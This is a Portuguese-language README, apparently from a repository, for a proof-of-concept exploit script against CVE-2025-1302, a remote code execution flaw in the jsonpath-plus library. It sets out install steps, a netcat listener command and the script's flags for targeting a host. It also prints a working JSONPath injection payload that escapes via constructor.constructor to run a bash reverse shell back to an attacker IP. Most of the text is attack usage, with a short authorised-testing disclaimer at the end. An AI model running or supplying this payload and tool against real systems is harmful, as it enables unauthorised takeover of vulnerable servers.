
Exploit PoC e demonstração de servidor vulnerável para CVE-2025-1302 no jsonpath-plus.
Nome do Script PoC: poc.py
Um script de prova de conceito para explorar CVE-2025-1302, que visa uma vulnerabilidade de RCE na biblioteca jsonpath-plus. Quando executado contra um endpoint de serviço vulnerável, o script tenta disparar execução remota de código através de um payload JSONPath e estabelecer uma reverse shell de volta para o atacante.
--method ou --no-fallback.{ip} e {port}.tqdm.--output.Clone este repositório:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
Instale as dependências (requer Python 3.6+):
pip install -r requirements.txt
Inicie um listener na sua máquina atacante (substitua a porta conforme necessário):
nc -lvnp 9999
Execute o PoC:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: Arquivo contendo um payload JSONPath por linha. Use os placeholders {ip} e {port}.--delay: Segundos para esperar antes de enviar payloads (mostra contagem regressiva).--method: Força POST, GET ou AUTO (padrão).--no-fallback: Atalho para pular qualquer repetição GET (equivalente a --method POST).--output: Caminho para salvar o registro JSON das tentativas.$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
Use este script apenas em ambientes de laboratório controlados contra sistemas que você possui ou tem permissão explícita para testar. O uso indevido pode ser ilegal e antiético.